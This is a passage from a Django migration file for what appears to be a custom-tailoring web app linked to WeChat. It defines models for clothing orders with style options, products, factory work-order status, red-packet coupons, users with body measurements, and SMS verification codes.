('libu_sy', models.CharField(default=b'', choices=[(b'\xe9\xbb\x91\xe9\xa1\xba\xef\xbc\x9aK-2', b'\xe9\xbb\x91\xe9\xa1\xba\xef\xbc\x9aK-2'), (b'\xe9\xbb\x91\xe6\x92\x9e\xef\xbc\x9aJ-33', b'\xe9\xbb\x91\xe6\x92\x9e\xef\xbc\x9aJ-33'), (b'\xe8\x93\x9d\xe9\xa1\xba\xef\xbc\x9a#45', b'\xe8\x93\x9d\xe9\xa1\xba\xef\xbc\x9a#45'), (b'\xe8\x93\x9d\xe6\x92\x9e\xef\xbc\x9ak-10', b'\xe8\x93\x9d\xe6\x92\x9e\xef\xbc\x9ak-10'), (b'\xe7\x81\xb0\xe9\xa1\xba\xef\xbc\x9a#40', b'\xe7\x81\xb0\xe9\xa1\xba\xef\xbc\x9a#40'), (b'\xe7\x81\xb0\xe6\x92\x9e\xef\xbc\x9a#57', b'\xe7\x81\xb0\xe6\x92\x9e\xef\xbc\x9a#57')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\x87\x8c\xe5\xb8\x83')),
('guomian_sy', models.CharField(default=b'', choices=[(b'\xe7\x9b\xb4\xe8\xbf\x87\xe9\x9d\xa2', b'\xe7\x9b\xb4\xe8\xbf\x87\xe9\x9d\xa2'), (b'\xe8\xbf\x9e\xe8\x80\xb3\xe7\x9a\xae', b'\xe8\xbf\x9e\xe8\x80\xb3\xe7\x9a\xae')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xbf\x87\xe9\x9d\xa2')),
('kuzhe_xk', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe8\xa4\xb6', b'\xe6\x97\xa0\xe8\xa4\xb6'), (b'\xe5\x8d\x95\xe8\xa4\xb6', b'\xe5\x8d\x95\xe8\xa4\xb6'), (b'\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe5\x8f\x8c\xe8\xa4\xb6')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\xa4\xb6\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('houdou_xk', models.CharField(default=b'', choices=[(b'\xe5\x8f\xb3\xe8\xbe\xb9', b'\xe5\x8f\xb3\xe8\xbe\xb9'), (b'\xe4\xb8\xa4\xe8\xbe\xb9', b'\xe4\xb8\xa4\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe5\x85\x9c\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('kujiao_xk', models.CharField(default=b'', choices=[(b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9', b'\xe5\x86\x85\xe6\x8a\x98\xe8\xbe\xb9'), (b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9', b'\xe5\xa4\x96\xe7\xbf\xbb\xe8\xbe\xb9')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\x84\x9a\xef\xbc\x88\xe8\xa5\xbf\xe8\xa3\xa4\xef\xbc\x89')),
('beizhu_xk', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe8\xa5\xbf\xe8\xa3\xa4\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
('lingxing_cs', models.CharField(default=b'', choices=[(b'\xe6\xa0\x87\xe5\x87\x86', b'\xe6\xa0\x87\xe5\x87\x86'), (b'\xe5\x85\xab\xe5\xad\x97', b'\xe5\x85\xab\xe5\xad\x97'), (b'\xe4\xb8\x80\xe5\xad\x97', b'\xe4\xb8\x80\xe5\xad\x97'), (b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86', b'\xe9\xa2\x86\xe5\xb0\x96\xe6\x89\xa3\xe9\xa2\x86'), (b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86', b'\xe5\xb0\x8f\xe6\x96\xb9\xe9\xa2\x86'), (b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86', b'\xe7\xa4\xbc\xe6\x9c\x8d\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9e\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('xiukou_cs', models.CharField(default=b'', choices=[(b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92', b'2\xe7\xb2\x92\xe7\x9b\xb4\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92', b'2\xe7\xb2\x92\xe6\x96\x9c\xe8\xa7\x92'), (b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92', b'2\xe7\xb2\x92\xe5\x9c\x86\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe7\x9b\xb4\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe6\x96\x9c\xe8\xa7\x92'), (b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92', b'\xe6\xb3\x95\xe5\xbc\x8f\xe5\x9c\x86\xe8\xa7\x92')], max_length=16, blank=True, null=True, verbose_name=b'\xe8\xa2\x96\xe5\x8f\xa3\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('xiabai_cs', models.CharField(default=b'', choices=[(b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86', b'\xe7\x9b\xb4\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xb0\x8f\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86'), (b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86', b'\xe5\xa4\xa7\xe5\x9c\x86\xe4\xb8\x8b\xe6\x91\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe4\xb8\x8b\xe6\x91\x86\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('menjin_cs', models.CharField(default=b'', choices=[(b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x98\x8e\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f', b'\xe6\x9a\x97\xe9\x97\xa8\xe8\xa5\x9f'), (b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f', b'\xe5\xb9\xb3\xe9\x97\xa8\xe8\xa5\x9f')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\x97\xa8\xe8\xa5\x9f\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('houbei_cs', models.CharField(default=b'', choices=[(b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x82\xa9\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6', b'\xe5\x90\x8e\xe8\x83\x8c\xe5\xb7\xa5\xe5\xad\x97\xe8\xa4\xb6'), (b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6', b'\xe8\x85\xb0\xe9\x83\xa8\xe5\x8f\x8c\xe8\xa4\xb6'), (b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0', b'\xe5\x90\x8e\xe8\x83\x8c\xe6\x97\xa0')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x90\x8e\xe8\x83\x8c\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('koudai_cs', models.CharField(default=b'', choices=[(b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe6\x97\xa0\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x9b\xad\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\x85\xad\xe8\xa7\x92\xe5\x8f\xa3\xe8\xa2\x8b'), (b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b', b'\xe5\xb0\x96\xe5\x8f\xa3\xe8\xa2\x8b')], max_length=16, blank=True, null=True, verbose_name=b'\xe5\x8f\xa3\xe8\xa2\x8b\xef\xbc\x88\xe8\xa1\xac\xe8\xa1\xab\xef\xbc\x89')),
('beizhu_cs', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe8\xa1\xac\xe8\xa1\xab\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
('add_kuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe8\xa3\xa4\xe5\xad\x90')),
('add_majia', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe5\x8d\x95\xe5\x8a\xa0\xe9\xa9\xac\xe7\x94\xb2')),
('majia_lingxing', models.CharField(default=b'', choices=[(b'V\xe9\xa2\x86', b'V\xe9\xa2\x86'), (b'U\xe9\xa2\x86', b'U\xe9\xa2\x86')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe9\xa2\x86\xe5\x9e\x8b')),
('majia_kouxing', models.CharField(default=b'', choices=[(b'4', b'4'), (b'5', b'5'), (b'6', b'6'), (b'4*2', b'4*2'), (b'6*3', b'6*3'), (b'8*4', b'8*4')], max_length=16, blank=True, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe6\x89\xa3\xe5\x9e\x8b')),
('add_bespoke', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6Bespoke')),
('add_xiuzi', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe7\xbb\xa3\xe5\xad\x97')),
('xiuzi', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\xbb\xa3\xe5\xad\x97', blank=True)),
('beizhu', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe5\xa4\x87\xe6\xb3\xa8', blank=True)),
('huifang', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe5\x9b\x9e\xe8\xae\xbf\xe7\xbb\x93\xe6\x9e\x9c', blank=True)),
('xdy', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe4\xb8\x8b\xe5\x8d\x95\xe5\x91\x98', blank=True)),
('yjjq', models.DateTimeField(null=True, verbose_name=b'\xe9\xa2\x84\xe8\xae\xa1\xe4\xba\xa4\xe6\x9c\x9f', blank=True)),
('address', models.ForeignKey(verbose_name=b'\xe5\x9c\xb0\xe5\x9d\x80', blank=True, to='wap.Address4Order', null=True)),
('fabric', models.ForeignKey(verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99', blank=True, to='wap.Fabric', null=True)),
],
options={
'verbose_name': '\u8ba2\u5355',
'verbose_name_plural': '\u8ba2\u5355',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='OrderPersonalization',
fields=[
('clothparam_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='wap.ClothParam')),
('product_type', models.CharField(default=b'shirt', choices=[(b'suit', b'\xe8\xa5\xbf\xe6\x9c\x8d'), (b'shirt', b'\xe8\xa1\xac\xe8\xa1\xab')], max_length=10, blank=True, null=True, verbose_name=b'\xe5\xaf\xb9\xe5\xba\x94\xe4\xba\xa7\xe5\x93\x81\xe7\xb1\xbb\xe5\x9e\x8b')),
('product_name', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe5\xaf\xb9\xe5\xba\x94\xe4\xba\xa7\xe5\x93\x81\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
],
options={
'verbose_name': '\u5b9a\u5236\u4e2a\u6027\u5316',
'verbose_name_plural': '\u5b9a\u5236\u4e2a\u6027\u5316',
},
bases=('wap.clothparam',),
),
migrations.CreateModel(
name='Pack',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('volume', models.FloatField(max_length=64, null=True, verbose_name=b'\xe6\x95\xb0\xe9\x87\x8f', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u5305\u88c5\u6750\u6599',
'verbose_name_plural': '\u5305\u88c5\u6750\u6599',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Plant_update',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('zhizuo_time', models.DateTimeField(null=True, verbose_name=b'\xe5\x88\xb6\xe4\xbd\x9c\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('wancheng_time', models.DateTimeField(null=True, verbose_name=b'\xe5\xae\x8c\xe6\x88\x90\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('peishong_time', models.DateTimeField(null=True, verbose_name=b'\xe9\x85\x8d\xe9\x80\x81\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('jiaofu_time', models.DateTimeField(null=True, verbose_name=b'\xe4\xba\xa4\xe4\xbb\x98\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('plant_status', models.CharField(default=b'', max_length=32, verbose_name=b'\xe5\xb7\xa5\xe5\x8d\x95\xe7\x8a\xb6\xe6\x80\x81')),
('issue', models.CharField(default=b'', max_length=256, null=True, verbose_name=b'\xe9\x97\xae\xe9\xa2\x98\xe5\x8f\x8d\xe9\xa6\x88', blank=True)),
('gh', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe5\xb7\xa5\xe5\x8f\xb7', blank=True)),
('order', models.ForeignKey(verbose_name=b'\xe8\xae\xa2\xe5\x8d\x95', to='wap.Order')),
],
options={
'verbose_name': '\u5de5\u5355\u72b6\u6001',
'verbose_name_plural': '\u5de5\u5355\u72b6\u6001',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=128, null=True, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0', blank=True)),
('img_with_text', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe5\xb8\xa6\xe6\x96\x87\xe5\xad\x97\xe7\x9a\x84\xe4\xba\xa7\xe5\x93\x81\xe5\x9b\xbe\xe7\x89\x87\xef\xbc\x8c\xe7\x94\xa8\xe5\x9c\xa8\xe4\xba\xa7\xe5\x93\x81\xe5\x88\x97\xe8\xa1\xa8', blank=True)),
('img', models.ImageField(upload_to=wap.models.get_uploadto_path, null=True, verbose_name=b'\xe4\xba\xa7\xe5\x93\x81\xe5\x9b\xbe\xe7\x89\x87\xef\xbc\x8c\xe7\x94\xa8\xe5\x9c\xa8\xe4\xba\xa7\xe5\x93\x81\xe8\xaf\xa6\xe6\x83\x85\xe9\xa1\xb6\xe9\x83\xa8', blank=True)),
('price', models.IntegerField(max_length=11, null=True, verbose_name=b'\xe4\xbb\xb7\xe6\xa0\xbc', blank=True)),
('fabricname', models.TextField(null=True, verbose_name=b'\xe9\x9d\xa2\xe6\x96\x99\xef\xbc\x8c|\xe5\x88\x86\xe5\x89\xb2', blank=True)),
('craft', models.TextField(null=True, verbose_name=b'\xe5\xb7\xa5\xe8\x89\xba\xef\xbc\x8c|\xe5\x88\x86\xe5\x89\xb2', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('type', models.CharField(default=b'shirt', max_length=10, verbose_name=b'\xe4\xba\xa7\xe5\x93\x81\xe7\xb1\xbb\xe5\x9e\x8b', choices=[(b'suit', b'\xe8\xa5\xbf\xe6\x9c\x8d'), (b'shirt', b'\xe8\xa1\xac\xe8\xa1\xab')])),
],
options={
'verbose_name': '\u4ea7\u54c1(\u897f\u88c5\u886c\u886b)',
'verbose_name_plural': '\u4ea7\u54c1(\u897f\u88c5\u886c\u886b)',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Redpacket',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('openid', models.CharField(default=b'', max_length=256, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\xa0\x87\xe8\xaf\x86\xe5\x8f\xb7')),
('phonenumber', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('nickname', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe6\x98\xb5\xe7\xa7\xb0', blank=True)),
('headimgurl', models.CharField(max_length=500, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe5\xa4\xb4\xe5\x83\x8f', blank=True)),
('isUsed', models.CharField(default=b'0', max_length=2, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe4\xbd\xbf\xe7\x94\xa8', choices=[(b'1', b'\xe5\xb7\xb2\xe4\xbd\xbf\xe7\x94\xa8'), (b'0', b'\xe6\x9c\xaa\xe4\xbd\xbf\xe7\x94\xa8')])),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('money', models.IntegerField(default=0, max_length=8, null=True, verbose_name=b'\xe9\x87\x91\xe9\xa2\x9d', blank=True)),
('type', models.CharField(default=b'', choices=[(b'A', b'\xe6\x8a\xbd\xe5\x8f\x96\xe7\xba\xa2\xe5\x8c\x85'), (b'B', b'\xe8\xbd\xac\xe5\x8f\x91\xe7\xba\xa2\xe5\x8c\x85')], max_length=10, blank=True, null=True, verbose_name=b'\xe7\xba\xa2\xe5\x8c\x85\xe7\xb1\xbb\xe5\x9e\x8b')),
('end_day', models.DateTimeField(null=True, verbose_name=b'\xe5\xa4\xb1\xe6\x95\x88\xe6\x97\xa5\xe6\x9c\x9f', blank=True)),
],
options={
'verbose_name': '\u5fae\u4fe1\u7ea2\u5305',
'verbose_name_plural': '\u5fae\u4fe1\u7ea2\u5305',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('openid', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xbe\xae\xe4\xbf\xa1\xe7\x94\xa8\xe6\x88\xb7\xe6\xa0\x87\xe8\xaf\x86', blank=True)),
('nickname', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe6\x98\xb5\xe7\xa7\xb0', blank=True)),
('name', models.CharField(default=b'', max_length=128, null=True, verbose_name=b'\xe5\xa7\x93\xe5\x90\x8d', blank=True)),
('sex', models.CharField(default=b'\xe7\x94\xb7', choices=[(b'\xe5\xa5\xb3', b'\xe5\xa5\xb3'), (b'\xe7\x94\xb7', b'\xe7\x94\xb7')], max_length=10, blank=True, null=True, verbose_name=b'\xe6\x80\xa7\xe5\x88\xab')),
('phonenumber', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('password', models.CharField(default=b'', max_length=64, null=True, verbose_name=b'\xe5\xaf\x86\xe7\xa0\x81', blank=True)),
('shoulder_percent', models.IntegerField(default=b'0', max_length=11, null=True, verbose_name=b'\xe8\x82\xa9\xe5\xae\xbd\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('chest_percent', models.IntegerField(default=b'0', max_length=11, null=True, verbose_name=b'\xe8\x83\xb8\xe5\x9b\xb4\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('waist_percent', models.IntegerField(default=b'0', max_length=11, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x9b\xb4\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('hip_percent', models.IntegerField(default=b'0', max_length=11, null=True, verbose_name=b'\xe8\x87\x80\xe5\x9b\xb4\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('leg_percent', models.IntegerField(default=b'0', max_length=11, null=True, verbose_name=b'\xe8\x85\xbf\xe9\x95\xbf\xe7\x99\xbe\xe5\x88\x86\xe6\xaf\x94', blank=True)),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
('measure_time', models.DateTimeField(null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe6\x97\xb6\xe9\x97\xb4', blank=True)),
('measure_phonenumber', models.CharField(default=b'', max_length=16, null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe6\x97\xb6\xe8\xae\xb0\xe5\xbd\x95\xe7\x9a\x84\xe7\x94\xb5\xe8\xaf\x9d', blank=True)),
('measure_status', models.BooleanField(default=False, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe9\x87\x8f\xe4\xbd\x93\xe5\xae\x8c\xe6\x88\x90')),
('height', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe8\xba\xab\xe9\xab\x98', blank=True)),
('weight', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe4\xbd\x93\xe9\x87\x8d', blank=True)),
('favor', models.CharField(default=b'', choices=[(b'0', b'\xe4\xbf\xae\xe8\xba\xab'), (b'1', b'\xe5\x90\x88\xe8\xba\xab'), (b'2', b'\xe5\xae\xbd\xe6\x9d\xbe')], max_length=32, blank=True, null=True, verbose_name=b'\xe4\xb8\xaa\xe4\xba\xba\xe5\x81\x8f\xe5\xa5\xbd')),
('istie', models.CharField(default=b'', choices=[(b'0', b'\xe6\x89\x93\xe9\xa2\x86\xe5\xb8\xa6'), (b'1', b'\xe4\xb8\x8d\xe6\x89\x93\xe9\xa2\x86\xe5\xb8\xa6')], max_length=32, blank=True, null=True, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe6\x89\x93\xe9\xa2\x86\xe5\xb8\xa6')),
('iswatch', models.CharField(default=b'', choices=[(b'2', b'\xe6\x97\xa0\xe6\x89\x8b\xe8\xa1\xa8'), (b'1', b'\xe6\x89\x8b\xe8\xa1\xa8\xe5\x8f\xb3'), (b'0', b'\xe6\x89\x8b\xe8\xa1\xa8\xe5\xb7\xa6')], max_length=32, blank=True, null=True, verbose_name=b'\xe6\x98\xaf\xe5\x90\xa6\xe6\x88\xb4\xe6\x89\x8b\xe8\xa1\xa8')),
('suit_shangyi', models.CharField(default=b'', choices=[(b'0', b'\xe9\x95\xbf'), (b'1', b'\xe7\x9f\xad')], max_length=32, blank=True, null=True, verbose_name=b'\xe8\xa5\xbf\xe8\xa3\x85\xe4\xb8\x8a\xe8\xa1\xa3')),
('lingwei', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe9\xa2\x86\xe5\x9b\xb4', blank=True)),
('chest', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe8\x83\xb8\xe5\x9b\xb4', blank=True)),
('waist', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe8\x85\xb0\xe5\x9b\xb4', blank=True)),
('shoulder', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x82\xa9\xe5\xae\xbd', blank=True)),
('sleeve_right', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe9\x95\xbf\xef\xbc\x88\xe9\xbb\x98\xe8\xae\xa4\xe5\x8f\xb3\xef\xbc\x89', blank=True)),
('sleeve_lefet', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe9\x95\xbf\xef\xbc\x88\xe5\xb7\xa6\xef\xbc\x89', blank=True)),
('back_cloth', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\x90\x8e\xe8\xa1\xa3\xe9\x95\xbf', blank=True)),
('dianjian_right', models.CharField(default=b'0', max_length=32, verbose_name=b'\xe5\x9e\xab\xe8\x82\xa9\xef\xbc\x88\xe9\xbb\x98\xe8\xae\xa4\xe5\x8f\xb3\xef\xbc\x89', blank=True)),
('dianjian_left', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\x9e\xab\xe8\x82\xa9\xef\xbc\x88\xe5\xb7\xa6\xef\xbc\x89', blank=True)),
('chest_distance', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x83\xb8\xe9\x97\xb4\xe8\xb7\x9d', blank=True)),
('chest_height', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x83\xb8\xe9\xab\x98\xe7\x82\xb9', blank=True)),
('stomach', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x82\x9a\xe5\x9b\xb4', blank=True)),
('hip', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x87\x80\xe5\x9b\xb4', blank=True)),
('kuyao', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\xa4\xe8\x85\xb0\xe5\x9b\xb4', blank=True)),
('kuchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\xa4\xe9\x95\xbf', blank=True)),
('hengdang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe6\xa8\xaa\xe8\xa3\x86', blank=True)),
('xiwei', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\x86\x9d\xe5\x9b\xb4', blank=True)),
('kukou', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\xa4\xe5\x8f\xa3', blank=True)),
('qunchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa3\x99\xe9\x95\xbf', blank=True)),
('lidang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe7\xab\x8b\xe8\xa3\x86', blank=True)),
('majia_qianchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe5\x89\x8d\xe9\x95\xbf', blank=True)),
('majia_houchang', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe9\xa9\xac\xe7\x94\xb2\xe5\x90\x8e\xe9\x95\xbf', blank=True)),
('xiulong', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe7\xac\xbc', blank=True)),
('chougenfen', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe8\xa2\x96\xe6\xa0\xb9\xe8\x82\xa5', blank=True)),
('xiukou_right', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\x8f\xb3\xe8\xa2\x96\xe5\x8f\xa3', blank=True)),
('xiukou_left', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe5\xb7\xa6\xe8\xa2\x96\xe5\x8f\xa3', blank=True)),
('tingxiong', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe6\x8c\xba\xe8\x83\xb8', blank=True)),
('tuobei', models.CharField(default=b'0', max_length=32, null=True, verbose_name=b'\xe9\xa9\xbc\xe8\x83\x8c', blank=True)),
('liangtishi', models.CharField(default=b'', max_length=32, null=True, verbose_name=b'\xe9\x87\x8f\xe4\xbd\x93\xe5\xb8\x88', blank=True)),
],
options={
'verbose_name': '\u6ce8\u518c\u7528\u6237',
'verbose_name_plural': '\u6ce8\u518c\u7528\u6237',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='VerificationCode',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('code', models.CharField(max_length=8, null=True, verbose_name=b'\xe9\xaa\x8c\xe8\xaf\x81\xe7\xa0\x81', blank=True)),
('phone', models.CharField(max_length=16, null=True, verbose_name=b'\xe6\x89\x8b\xe6\x9c\xba\xe5\x8f\xb7\xe7\xa0\x81', blank=True)),
('use_time', models.DateTimeField(null=True, verbose_name=b'\xe9\xaa\x8c\xe8\xaf\x81\xe6\x97\xb6\xe9\x97\xb4')),
('expire_time', models.DateTimeField(null=True, verbose_name=b'\xe5\xa4\xb1\xe6\x95\x88\xe6\x97\xb6\xe9\x97\xb4')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
],
options={
'verbose_name': '\u9a8c\u8bc1\u7801',
'verbose_name_plural': '\u9a8c\u8bc1\u7801',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Worktime',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(default=b'', max_length=256, verbose_name=b'\xe5\x90\x8d\xe7\xa7\xb0')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name=b'\xe5\x88\x9b\xe5\xbb\xba\xe6\x97\xb6\xe9\x97\xb4')),
